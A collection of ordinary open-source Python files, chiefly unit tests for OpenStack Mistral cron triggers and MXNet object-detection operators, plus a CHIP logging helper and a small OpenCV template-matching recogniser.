history = list(self.alarm_conn.query_alarm_history(
filter_expr=filter_expr, orderby=[{"timestamp": "asc"}]))
self.assertEqual(3, len(history))
self.assertEqual([alarm_models.AlarmChange.CREATION,
alarm_models.AlarmChange.RULE_CHANGE,
alarm_models.AlarmChange.STATE_TRANSITION],
[h.type for h in history])
| openstack/aodh | aodh/tests/functional/storage/test_storage_scenarios.py | Python | apache-2.0 | 22,582 |
#
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Pretty print logging."""
import logging
import pprint
from typing import Any
def log(level: int, x: Any) -> None:
if logging.getLogger(None).isEnabledFor(level):
for line in pprint.pformat(x).split('\n'):
logging.log(level, line)
def info(x: Any) -> None:
log(logging.INFO, x)
def debug(x: Any) -> None:
log(logging.DEBUG, x)
| project-chip/connectedhomeip | scripts/tools/memory/memdf/util/pretty.py | Python | apache-2.0 | 957 |
# Copyright 2014 - Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
from unittest import mock
import sqlalchemy as sa
from mistral.db.v2 import api as db_api
from mistral.db.v2.sqlalchemy import models
from mistral import exceptions as exc
from mistral.services import security
from mistral.tests.unit.api import base
from mistral.tests.unit import base as unit_base
WF = models.WorkflowDefinition(
spec={
'version': '2.0',
'name': 'my_wf',
'tasks': {
'task1': {
'action': 'std.noop'
}
}
}
)
WF.update({'id': '123e4567-e89b-12d3-a456-426655440000', 'name': 'my_wf'})
TRIGGER = {
'id': '02abb422-55ef-4bb2-8cb9-217a583a6a3f',
'name': 'my_cron_trigger',
'pattern': '* * * * *',
'workflow_name': WF.name,
'workflow_id': '123e4567-e89b-12d3-a456-426655440000',
'workflow_input': '{}',
'workflow_params': '{}',
'scope': 'private',
'remaining_executions': 42
}
trigger_values = copy.deepcopy(TRIGGER)
trigger_values['workflow_input'] = json.loads(
trigger_values['workflow_input'])
trigger_values['workflow_params'] = json.loads(
trigger_values['workflow_params'])
TRIGGER_DB = models.CronTrigger()
TRIGGER_DB.update(trigger_values)
TRIGGER_DB_WITH_PROJECT_ID = TRIGGER_DB.get_clone()
TRIGGER_DB_WITH_PROJECT_ID.project_id = '<default-project>'
MOCK_WF = mock.MagicMock(return_value=WF)
MOCK_TRIGGER = mock.MagicMock(return_value=TRIGGER_DB)
MOCK_TRIGGERS = mock.MagicMock(return_value=[TRIGGER_DB])
MOCK_DELETE = mock.MagicMock(return_value=1)
MOCK_EMPTY = mock.MagicMock(return_value=[])
MOCK_NOT_FOUND = mock.MagicMock(side_effect=exc.DBEntityNotFoundError())
MOCK_DUPLICATE = mock.MagicMock(side_effect=exc.DBDuplicateEntryError())
class TestCronTriggerController(base.APITest):
@mock.patch.object(db_api, "get_cron_trigger", MOCK_TRIGGER)
def test_get(self):
resp = self.app.get('/v2/cron_triggers/my_cron_trigger')
self.assertEqual(200, resp.status_int)
self.assertDictEqual(TRIGGER, resp.json)
@mock.patch.object(db_api, 'get_cron_trigger')
def test_get_operational_error(self, mocked_get):
mocked_get.side_effect = [
# Emulating DB OperationalError
sa.exc.OperationalError('Mock', 'mock', 'mock'),
TRIGGER_DB # Successful run
]
resp = self.app.get('/v2/cron_triggers/my_cron_trigger')
self.assertEqual(200, resp.status_int)
self.assertDictEqual(TRIGGER, resp.json)
@mock.patch.object(db_api, "get_cron_trigger",
return_value=TRIGGER_DB_WITH_PROJECT_ID)
def test_get_within_project_id(self, mock_get):
resp = self.app.get('/v2/cron_triggers/my_cron_trigger')
self.assertEqual(200, resp.status_int)
self.assertTrue('project_id' in resp.json)
@mock.patch.object(db_api, "get_cron_trigger", MOCK_NOT_FOUND)
def test_get_not_found(self):
resp = self.app.get(
'/v2/cron_triggers/my_cron_trigger',
expect_errors=True
)
self.assertEqual(404, resp.status_int)
@mock.patch.object(db_api, "get_cron_trigger", MOCK_TRIGGER)
def test_get_by_id(self):
resp = self.app.get(
"/v2/cron_triggers/02abb422-55ef-4bb2-8cb9-217a583a6a3f")
self.assertEqual(200, resp.status_int)
self.assertDictEqual(TRIGGER, resp.json)
@mock.patch.object(db_api, "get_workflow_definition", MOCK_WF)
@mock.patch.object(db_api, "create_cron_trigger")
def test_post(self, mock_mtd):
mock_mtd.return_value = TRIGGER_DB
resp = self.app.post_json('/v2/cron_triggers', TRIGGER)
self.assertEqual(201, resp.status_int)
self.assertDictEqual(TRIGGER, resp.json)
self.assertEqual(1, mock_mtd.call_count)
values = mock_mtd.call_args[0][0]
self.assertEqual('* * * * *', values['pattern'])
self.assertEqual(42, values['remaining_executions'])
@mock.patch.object(db_api, "get_workflow_definition", MOCK_WF)
@mock.patch.object(db_api, "create_cron_trigger", MOCK_DUPLICATE)
@mock.patch.object(security, "delete_trust")
def test_post_dup(self, delete_trust):
resp = self.app.post_json(
'/v2/cron_triggers', TRIGGER, expect_errors=True
)
self.assertEqual(1, delete_trust.call_count)
self.assertEqual(409, resp.status_int)
@mock.patch.object(db_api, "get_workflow_definition", MOCK_WF)
@mock.patch.object(db_api, "create_cron_trigger", MOCK_DUPLICATE)
def test_post_same_wf_and_input(self):
trig = TRIGGER.copy()
trig['name'] = 'some_trigger_name'
resp = self.app.post_json(
'/v2/cron_triggers', trig, expect_errors=True
)
self.assertEqual(409, resp.status_int)
@mock.patch.object(db_api, "get_cron_trigger", MOCK_TRIGGER)
@mock.patch.object(db_api, "delete_cron_trigger", MOCK_DELETE)
@mock.patch.object(security, "delete_trust")
def test_delete(self, delete_trust):
resp = self.app.delete('/v2/cron_triggers/my_cron_trigger')
self.assertEqual(1, delete_trust.call_count)
self.assertEqual(204, resp.status_int)
@mock.patch.object(db_api, "get_cron_trigger", MOCK_TRIGGER)
@mock.patch.object(db_api, "delete_cron_trigger", MOCK_DELETE)
@mock.patch.object(security, "delete_trust")
def test_delete_by_id(self, delete_trust):
resp = self.app.delete(
'/v2/cron_triggers/02abb422-55ef-4bb2-8cb9-217a583a6a3f')
self.assertEqual(1, delete_trust.call_count)
self.assertEqual(204, resp.status_int)
@mock.patch.object(db_api, "delete_cron_trigger", MOCK_NOT_FOUND)
def test_delete_not_found(self):
resp = self.app.delete(
'/v2/cron_triggers/my_cron_trigger',
expect_errors=True
)
self.assertEqual(404, resp.status_int)
@mock.patch.object(db_api, "get_cron_triggers", MOCK_TRIGGERS)
def test_get_all(self):
resp = self.app.get('/v2/cron_triggers')
self.assertEqual(200, resp.status_int)
self.assertEqual(1, len(resp.json['cron_triggers']))
self.assertDictEqual(TRIGGER, resp.json['cron_triggers'][0])
@mock.patch.object(db_api, 'get_cron_triggers')
def test_get_all_operational_error(self, mocked_get_all):
mocked_get_all.side_effect = [
# Emulating DB OperationalError
sa.exc.OperationalError('Mock', 'mock', 'mock'),
[TRIGGER_DB] # Successful run
]
resp = self.app.get('/v2/cron_triggers')
self.assertEqual(200, resp.status_int)
self.assertEqual(1, len(resp.json['cron_triggers']))
self.assertDictEqual(TRIGGER, resp.json['cron_triggers'][0])
@mock.patch.object(db_api, 'get_cron_triggers')
@mock.patch('mistral.context.MistralContext.from_environ')
def test_get_all_projects_admin(self, mock_context, mock_get_triggers):
admin_ctx = unit_base.get_context(admin=True)
mock_context.return_value = admin_ctx
resp = self.app.get('/v2/cron_triggers?all_projects=true')
self.assertEqual(200, resp.status_int)
self.assertTrue(mock_get_triggers.call_args[1].get('insecure', False))
@mock.patch.object(db_api, 'get_cron_triggers')
@mock.patch('mistral.context.MistralContext.from_environ')
def test_get_all_filter_project(self, mock_context, mock_get_triggers):
admin_ctx = unit_base.get_context(admin=True)
mock_context.return_value = admin_ctx
resp = self.app.get(
'/v2/cron_triggers?all_projects=true&'
'project_id=192796e61c174f718d6147b129f3f2ff'
)
self.assertEqual(200, resp.status_int)
self.assertTrue(mock_get_triggers.call_args[1].get('insecure', False))
self.assertEqual(
{'eq': '192796e61c174f718d6147b129f3f2ff'},
mock_get_triggers.call_args[1].get('project_id')
)
@mock.patch.object(db_api, "get_cron_triggers", MOCK_EMPTY)
def test_get_all_empty(self):
resp = self.app.get('/v2/cron_triggers')
self.assertEqual(200, resp.status_int)
self.assertEqual(0, len(resp.json['cron_triggers']))
| openstack/mistral | mistral/tests/unit/api/v2/test_cron_triggers.py | Python | apache-2.0 | 8,830 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
import numpy as np
import mxnet as mx
import random
import itertools
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from common import with_seed
import unittest
def test_box_nms_op():
def test_box_nms_forward(data, expected, thresh=0.5, valid=0, topk=-1, coord=2, score=1, cid=0, bid=-1,
force=False, in_format='corner', out_format='corner'):
for dtype in ['float16', 'float32', 'float64']:
data = mx.nd.array(data, dtype=dtype)
out = mx.contrib.nd.box_nms(data, overlap_thresh=thresh, valid_thresh=valid, topk=topk,
coord_start=coord, score_index=score, id_index=cid, background_id=bid,
force_suppress=force, in_format=in_format, out_format=out_format)
assert_almost_equal(out.asnumpy(), expected.astype(dtype), rtol=1e-3, atol=1e-3)
def test_box_nms_backward(data, grad, expected, thresh=0.5, valid=0, topk=-1, coord=2, score=1,
cid=0, bid=-1, force=False, in_format='corner', out_format='corner'):
in_var = mx.sym.Variable('data')
arr_data = mx.nd.array(data)
arr_grad = mx.nd.empty(arr_data.shape)
op = mx.contrib.sym.box_nms(in_var, overlap_thresh=thresh, valid_thresh=valid, topk=topk,
coord_start=coord, score_index=score, id_index=cid, background_id=bid,
force_suppress=force, in_format=in_format, out_format=out_format)
exe = op.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
exe.forward(is_train=True)
exe.backward(mx.nd.array(grad))
assert_almost_equal(arr_grad.asnumpy(), expected)
def corner_to_center(data):
out = np.reshape(data, (-1, 6)).copy()
out[:, 2] = (data[:, 2] + data[:, 4]) / 2.0
out[:, 3] = (data[:, 3] + data[:, 5]) / 2.0
out[:, 4] = data[:, 4] - data[:, 2]
out[:, 5] = data[:, 5] - data[:, 3]
invalid = np.where(data[:, 0] < 0)[0]
out[invalid, :] = -1
return out
def center_to_corner(data):
data = np.reshape(data, (-1, 6)).copy()
out[:, 2] = data[:, 2] - data[:, 4] / 2.0
out[:, 3] = data[:, 3] - data[:, 5] / 2.0
out[:, 4] = data[:, 2] + data[:, 4] / 2.0
out[:, 5] = data[:, 3] + data[:, 5] / 2.0
invalid = np.where(data[:, 0] < 0)[0]
out[invalid, :] = -1
return out
def swap_position(data, expected, coord=2, score=1, cid=0, new_col=0):
data = np.reshape(data, (-1, 6))
expected = np.reshape(expected, (-1, 6))
new_coord = random.randint(0, 6 + new_col - 4)
others = list(range(new_coord)) + list(range(new_coord + 4, 6 + new_col))
random.shuffle(others)
new_score = others[0]
new_cid = others[1]
new_data = np.full((data.shape[0], data.shape[1] + new_col), -1.0)
new_expected = np.full((expected.shape[0], expected.shape[1] + new_col), -1.0)
new_data[:, new_coord:new_coord+4] = data[:, coord:coord+4]
new_data[:, new_score] = data[:, score]
new_data[:, new_cid] = data[:, cid]
new_expected[:, new_coord:new_coord+4] = expected[:, coord:coord+4]
new_expected[:, new_score] = expected[:, score]
new_expected[:, new_cid] = expected[:, cid]
return new_data, new_expected, new_coord, new_score, new_cid
# manually set up test cases
boxes = [[0, 0.5, 0.1, 0.1, 0.2, 0.2], [1, 0.4, 0.1, 0.1, 0.2, 0.2],
[0, 0.3, 0.1, 0.1, 0.14, 0.14], [2, 0.6, 0.5, 0.5, 0.7, 0.8]]
# case1
force = True
thresh = 0.5
expected = [[2, 0.6, 0.5, 0.5, 0.7, 0.8], [0, 0.5, 0.1, 0.1, 0.2, 0.2],
[0, 0.3, 0.1, 0.1, 0.14, 0.14], [-1, -1, -1, -1, -1, -1]]
grad = np.random.rand(4, 6)
expected_in_grad = grad[(1, 3, 2, 0), :]
expected_in_grad[1, :] = 0
test_box_nms_forward(np.array(boxes), np.array(expected), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes), grad, expected_in_grad, force=force, thresh=thresh)
# case2: multi batch
boxes2 = [boxes] * 3
expected2 = [expected] * 3
grad2 = np.array([grad.tolist()] * 3)
expected_in_grad2 = np.array([expected_in_grad.tolist()] * 3)
test_box_nms_forward(np.array(boxes2), np.array(expected2), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes2), grad2, expected_in_grad2, force=force, thresh=thresh)
# another new dim
boxes2 = [boxes2] * 2
expected2 = [expected2] * 2
grad2 = np.array([grad2.tolist()] * 2)
expected_in_grad2 = np.array([expected_in_grad2.tolist()] * 2)
test_box_nms_forward(np.array(boxes2), np.array(expected2), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes2), grad2, expected_in_grad2, force=force, thresh=thresh)
# case3: thresh
thresh = 0.1
boxes3 = boxes
expected3 = [[2, 0.6, 0.5, 0.5, 0.7, 0.8], [0, 0.5, 0.1, 0.1, 0.2, 0.2],
[-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]]
grad3 = np.random.rand(4, 6)
expected_in_grad3 = grad3[(1, 3, 2, 0), :]
expected_in_grad3[(1, 2), :] = 0
test_box_nms_forward(np.array(boxes3), np.array(expected3), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes3), grad3, expected_in_grad3, force=force, thresh=thresh)
# case4: non-force
boxes4 = boxes
force = False
expected4 = [[2, 0.6, 0.5, 0.5, 0.7, 0.8], [0, 0.5, 0.1, 0.1, 0.2, 0.2],
[1, 0.4, 0.1, 0.1, 0.2, 0.2], [-1, -1, -1, -1, -1, -1]]
grad4 = np.random.rand(4, 6)
expected_in_grad4 = grad4[(1, 2, 3, 0), :]
expected_in_grad4[2, :] = 0
test_box_nms_forward(np.array(boxes4), np.array(expected4), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes4), grad4, expected_in_grad4, force=force, thresh=thresh)
# case5: different coding
boxes5 = corner_to_center(np.array(boxes4))
test_box_nms_forward(np.array(boxes5), np.array(expected4), force=force, thresh=thresh,
in_format='center')
expected5 = corner_to_center(np.array(expected4))
test_box_nms_forward(np.array(boxes4), np.array(expected5), force=force, thresh=thresh,
out_format='center')
test_box_nms_forward(np.array(boxes5), np.array(expected5), force=force, thresh=thresh,
in_format='center', out_format='center')
# case6: different position
boxes6, expected6, new_coord, new_score, new_id = swap_position(np.array(boxes4),
np.array(expected4), new_col=2)
test_box_nms_forward(np.array(boxes6), np.array(expected6), force=force, thresh=thresh,
coord=new_coord, score=new_score, cid=new_id)
# case7: no id, should be same with force=True
force = False
thresh = 0.5
test_box_nms_forward(np.array(boxes), np.array(expected), force=force, thresh=thresh, cid=-1)
# case8: multi-batch thresh + topk
boxes8 = [[[1, 1, 0, 0, 10, 10], [1, 0.4, 0, 0, 10, 10], [1, 0.3, 0, 0, 10, 10]],
[[2, 1, 0, 0, 10, 10], [2, 0.4, 0, 0, 10, 10], [2, 0.3, 0, 0, 10, 10]],
[[3, 1, 0, 0, 10, 10], [3, 0.4, 0, 0, 10, 10], [3, 0.3, 0, 0, 10, 10]]]
expected8 = [[[1, 1, 0, 0, 10, 10], [-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]],
[[2, 1, 0, 0, 10, 10], [-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]],
[[3, 1, 0, 0, 10, 10], [-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]]]
grad8 = np.random.rand(3, 3, 6)
expected_in_grad8 = np.zeros((3, 3, 6))
expected_in_grad8[(0, 1, 2), (0, 0, 0), :] = grad8[(0, 1, 2), (0, 0, 0), :]
force = False
thresh = 0.5
valid = 0.5
topk = 2
test_box_nms_forward(np.array(boxes8), np.array(expected8), force=force, thresh=thresh, valid=valid, topk=topk)
test_box_nms_backward(np.array(boxes8), grad8, expected_in_grad8, force=force, thresh=thresh, valid=valid, topk=topk)
# case9: background id filter out
# default background id -1
boxes9 = [[0, 0.5, 0.1, 0.1, 0.2, 0.2], [0, 0.4, 0.1, 0.1, 0.2, 0.2],
[1, 0.3, 0.1, 0.1, 0.14, 0.14], [-1, 0.6, 0.5, 0.5, 0.7, 0.8]]
expected9 = [[0, 0.5, 0.1, 0.1, 0.2, 0.2], [1, 0.3, 0.1, 0.1, 0.14, 0.14],
[-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]]
force = True
thresh = 0.5
grad9 = np.random.rand(4, 6)
expected_in_grad9 = grad9[(0, 2, 1, 3), :]
expected_in_grad9[(1, 3), :] = 0
test_box_nms_forward(np.array(boxes9), np.array(expected9), force=force, thresh=thresh)
test_box_nms_backward(np.array(boxes9), grad9, expected_in_grad9, force=force, thresh=thresh)
# set background id
background_id = 0
expected9 = [[-1, 0.6, 0.5, 0.5, 0.7, 0.8], [1, 0.3, 0.1, 0.1, 0.14, 0.14],
[-1, -1, -1, -1, -1, -1], [-1, -1, -1, -1, -1, -1]]
grad9 = np.random.rand(4, 6)
expected_in_grad9 = grad9[(2, 3, 1, 0), :]
expected_in_grad9[(0, 1), :] = 0
test_box_nms_forward(np.array(boxes9), np.array(expected9), force=force, thresh=thresh, bid=background_id)
test_box_nms_backward(np.array(boxes9), grad9, expected_in_grad9, force=force, thresh=thresh, bid=background_id)
def test_box_iou_op():
def numpy_box_iou(a, b, fmt='corner'):
def area(left, top, right, bottom):
return np.maximum(0, right - left) * np.maximum(0, bottom - top)
assert a.shape[-1] == 4
assert b.shape[-1] == 4
oshape = a.shape[:-1] + b.shape[:-1]
a = a.reshape((-1, 4))
ashape = a.shape
b = b.reshape((-1, 4))
a = np.tile(a, reps=[1, b.shape[0]]).reshape((-1, 4))
b = np.tile(b, reps=[ashape[0], 1]).reshape((-1, 4))
if fmt == 'corner':
al, at, ar, ab = np.split(a, 4, axis=-1)
bl, bt, br, bb = np.split(b, 4, axis=-1)
elif fmt == 'center':
ax, ay, aw, ah = np.split(a, 4, axis=-1)
bx, by, bw, bh = np.split(b, 4, axis=-1)
al, at, ar, ab = ax - aw / 2, ay - ah / 2, ax + aw / 2, ay + ah / 2
bl, bt, br, bb = bx - bw / 2, by - bh / 2, bx + bw / 2, by + bh / 2
else:
raise NotImplementedError("Fmt {} not supported".format(fmt))
width = np.maximum(0, np.minimum(ar, br) - np.maximum(al, bl))
height = np.maximum(0, np.minimum(ab, bb) - np.maximum(at, bt))
intersect = width * height
union = area(al, at, ar, ab) + area(bl, bt, br, bb) - intersect
union[np.where(intersect <= 0)] = 1e-12
iou = intersect / union
return iou.reshape(oshape)
def generate_boxes(dims):
s1, off1, s2, off2 = np.random.rand(4) * 100
xy = np.random.rand(*(dims + [2])) * s1 + off1
wh = np.random.rand(*(dims + [2])) * s2 + off2
xywh = np.concatenate([xy, wh], axis=-1)
ltrb = np.concatenate([xy - wh / 2, xy + wh / 2], axis=-1)
return xywh, ltrb
for ndima in range(1, 6):
for ndimb in range(1, 6):
dims_a = np.random.randint(low=1, high=3, size=ndima).tolist()
dims_b = np.random.randint(low=1, high=3, size=ndimb).tolist()
# generate left, top, right, bottom
xywh_a, ltrb_a = generate_boxes(dims_a)
xywh_b, ltrb_b = generate_boxes(dims_b)
iou_np = numpy_box_iou(ltrb_a, ltrb_b, fmt='corner')
iou_np2 = numpy_box_iou(xywh_a, xywh_b, fmt='center')
iou_mx = mx.nd.contrib.box_iou(mx.nd.array(ltrb_a), mx.nd.array(ltrb_b), format='corner')
iou_mx2 = mx.nd.contrib.box_iou(mx.nd.array(xywh_a), mx.nd.array(xywh_b), format='center')
assert_allclose(iou_np, iou_np2, rtol=1e-5, atol=1e-5)
assert_allclose(iou_np, iou_mx.asnumpy(), rtol=1e-5, atol=1e-5)
assert_allclose(iou_np, iou_mx2.asnumpy(), rtol=1e-5, atol=1e-5)
def test_bipartite_matching_op():
def assert_match(inputs, x, y, threshold, is_ascend=False):
for dtype in ['float16', 'float32', 'float64']:
inputs = mx.nd.array(inputs, dtype=dtype)
x = np.array(x, dtype=dtype)
y = np.array(y, dtype=dtype)
a, b = mx.nd.contrib.bipartite_matching(inputs, threshold=threshold, is_ascend=is_ascend)
assert_array_equal(a.asnumpy().astype('int64'), x.astype('int64'))
assert_array_equal(b.asnumpy().astype('int64'), y.astype('int64'))
assert_match([[0.5, 0.6], [0.1, 0.2], [0.3, 0.4]], [1, -1, 0], [2, 0], 1e-12, False)
assert_match([[0.5, 0.6], [0.1, 0.2], [0.3, 0.4]], [-1, 0, 1], [1, 2], 100, True)
def test_multibox_target_op():
anchors = mx.nd.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8]], ctx=default_context()).reshape((1, -1, 4))
cls_pred = mx.nd.array(list(range(10)), ctx=default_context()).reshape((1, -1, 2))
label = mx.nd.array([1, 0.1, 0.1, 0.5, 0.6], ctx=default_context()).reshape((1, -1, 5))
loc_target, loc_mask, cls_target = \
mx.nd.contrib.MultiBoxTarget(anchors, label, cls_pred,
overlap_threshold=0.5,
negative_mining_ratio=3,
negative_mining_thresh=0.4)
expected_loc_target = np.array([[5.0, 2.5000005, 3.4657357, 4.581454, 0., 0., 0., 0.]])
expected_loc_mask = np.array([[1, 1, 1, 1, 0, 0, 0, 0]])
expected_cls_target = np.array([[2, 0]])
assert_allclose(loc_target.asnumpy(), expected_loc_target, rtol=1e-5, atol=1e-5)
assert_array_equal(loc_mask.asnumpy(), expected_loc_mask)
assert_array_equal(cls_target.asnumpy(), expected_cls_target)
def test_gradient_multiplier_op():
# We use the quadratic function in combination with gradient multiplier
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
m = np.random.random_sample() - 0.5
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
gr_q_sym = mx.sym.contrib.gradientmultiplier(quad_sym, scalar=m)
for dtype in [np.float16, np.float32, np.float64]:
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = (2 * a * data_np + b) * m
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
output = mx.nd.contrib.gradientmultiplier(output, scalar=m)
assert_almost_equal(output.asnumpy(), expected,
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check forward
check_symbolic_forward(gr_q_sym, [data_np], [expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward
check_symbolic_backward(gr_q_sym, [data_np], [np.ones(expected.shape)],
[backward_expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
def test_multibox_prior_op():
h = 561
w = 728
X = mx.nd.random.uniform(shape=(1, 3, h, w))
Y = mx.contrib.nd.MultiBoxPrior(X, sizes=[0.75, 0.5, 0.25], ratios=[1, 2, 0.5])
assert_array_equal(Y.shape, np.array((1, 2042040, 4)))
boxes = Y.reshape((h, w, 5, 4))
assert_allclose(boxes.asnumpy()[250, 250, 0, :], np.array([0.055117, 0.071524, 0.63307 , 0.821524]), atol=1e-5, rtol=1e-5)
# relax first ratio if user insists
Y = mx.contrib.nd.MultiBoxPrior(X, sizes=[0.75, 0.5, 0.25], ratios=[20, 2, 0.5])
boxes = Y.reshape((h, w, 5, 4))
assert_allclose(boxes.asnumpy()[250, 250, 0, :], np.array([-0.948249, 0.362671, 1.636436, 0.530377]), atol=1e-5, rtol=1e-5)
def test_box_encode_op():
anchors = mx.nd.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8]]).reshape((1, -1, 4))
refs = mx.nd.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8]]).reshape((1, -1, 4))
samples = mx.nd.array([[0, 1]])
matches = mx.nd.array([[0, 1]])
means = mx.nd.array([0.0, 0.0, 0.0, 0.0])
stds = mx.nd.array([0.1, 0.1, 0.2, 0.2])
Y, mask = mx.nd.contrib.box_encode(samples, matches, anchors, refs, means, stds)
assert_allclose(Y.asnumpy(), np.zeros((1, 2, 4)), atol=1e-5, rtol=1e-5)
assert_allclose(mask.asnumpy(), np.array([[[0., 0., 0., 0.], [1., 1., 1., 1.]]]), atol=1e-5, rtol=1e-5)
def test_box_decode_op():
data = mx.nd.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8]]).reshape((1, -1, 4))
anchors = mx.nd.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8]]).reshape((1, -1, 4))
Y = mx.nd.contrib.box_decode(data, anchors, .1, .1, .2, .2)
assert_allclose(Y.asnumpy(), np.array([[[-0.0562755, -0.00865743, 0.26227552, 0.42465743], \
[0.13240421, 0.17859563, 0.93759584, 1.1174043 ]]]), atol=1e-5, rtol=1e-5)
@with_seed()
def test_op_mrcnn_mask_target():
if default_context().device_type != 'gpu':
return
num_rois = 2
num_classes = 4
mask_size = (3, 3)
ctx = mx.gpu(0)
# (B, N, 4)
rois = mx.nd.array([[[2.3, 4.3, 2.2, 3.3],
[3.5, 5.5, 0.9, 2.4]]], ctx=ctx)
gt_masks = mx.nd.arange(0, 4*32*32, ctx=ctx).reshape(1, 4, 32, 32)
# (B, N)
matches = mx.nd.array([[2, 0]], ctx=ctx)
# (B, N)
cls_targets = mx.nd.array([[2, 1]], ctx=ctx)
mask_targets, mask_cls = mx.nd.contrib.mrcnn_mask_target(rois, gt_masks, matches, cls_targets,
num_rois=num_rois,
num_classes=num_classes,
mask_size=mask_size)
# Ground truth outputs were generated with GluonCV's target generator
# gluoncv.model_zoo.mask_rcnn.MaskTargetGenerator(1, num_rois, num_classes, mask_size)
gt_mask_targets = mx.nd.array([[[[[2193.4 , 2193.7332 , 2194.0667 ],
[2204.0667 , 2204.4 , 2204.7334 ],
[2214.7334 , 2215.0667 , 2215.4 ]],
[[2193.4 , 2193.7332 , 2194.0667 ],
[2204.0667 , 2204.4 , 2204.7334 ],
[2214.7334 , 2215.0667 , 2215.4 ]],
[[2193.4 , 2193.7332 , 2194.0667 ],
[2204.0667 , 2204.4 , 2204.7334 ],
[2214.7334 , 2215.0667 , 2215.4 ]],
[[2193.4 , 2193.7332 , 2194.0667 ],
[2204.0667 , 2204.4 , 2204.7334 ],
[2214.7334 , 2215.0667 , 2215.4 ]]],
[[[ 185. , 185.33334, 185.66667],
[ 195.66667, 196.00002, 196.33334],
[ 206.33333, 206.66666, 207. ]],
[[ 185. , 185.33334, 185.66667],
[ 195.66667, 196.00002, 196.33334],
[ 206.33333, 206.66666, 207. ]],
[[ 185. , 185.33334, 185.66667],
[ 195.66667, 196.00002, 196.33334],
[ 206.33333, 206.66666, 207. ]],
[[ 185. , 185.33334, 185.66667],
[ 195.66667, 196.00002, 196.33334],
[ 206.33333, 206.66666, 207. ]]]]])
gt_mask_cls = mx.nd.array([[0,0,1,0], [0,1,0,0]])
gt_mask_cls = gt_mask_cls.reshape(1,2,4,1,1).broadcast_axes(axis=(3,4), size=(3,3))
assert_almost_equal(mask_targets.asnumpy(), gt_mask_targets.asnumpy())
assert_almost_equal(mask_cls.asnumpy(), gt_mask_cls.asnumpy())
if __name__ == '__main__':
import nose
nose.runmodule()
| mlperf/training_results_v0.7 | Fujitsu/benchmarks/resnet/implementations/implementation_open/mxnet/tests/python/unittest/test_contrib_operator.py | Python | apache-2.0 | 21,277 |
import sys
import cv2
import helper as hp
class MSP():
name = "MSP"
def __init__(self):
self.__patterns_num = []
self.__patterns_sym = []
self.__labels_num = []
self.__labels_sym = []
msp_num, msp_sym = "msp/num", "msp/sym"
self.__load_num_patterns(msp_num)
self.__load_sym_patterns(msp_sym)
print 'loading MSP...'
def __load_num_patterns(self, input_dir):
paths = hp.get_paths(input_dir)
self.__patterns_num = [hp.get_gray_image(input_dir, path) for path in paths]
self.__labels_num = [hp.get_test(path, "num")[0] for path in paths]
def __load_sym_patterns(self, input_dir):
paths = hp.get_paths(input_dir)
self.__patterns_sym = [hp.get_gray_image(input_dir, path) for path in paths]
self.__labels_sym = [hp.get_test(path, "sym")[0] for path in paths]
def __get_mode(self, mode):
if mode == "num":
return self.__labels_num, self.__patterns_num
elif mode == "sym":
return self.__labels_sym, self.__patterns_sym
def rec(self, img, mode):
tmp_max, tmp, rec = sys.maxint, 0, 0
labels, patterns = self.__get_mode(mode)
for pattern, label in zip(patterns, labels):
tmp = cv2.countNonZero(pattern - img)
if tmp < tmp_max: tmp_max, rec = tmp, label
return rec
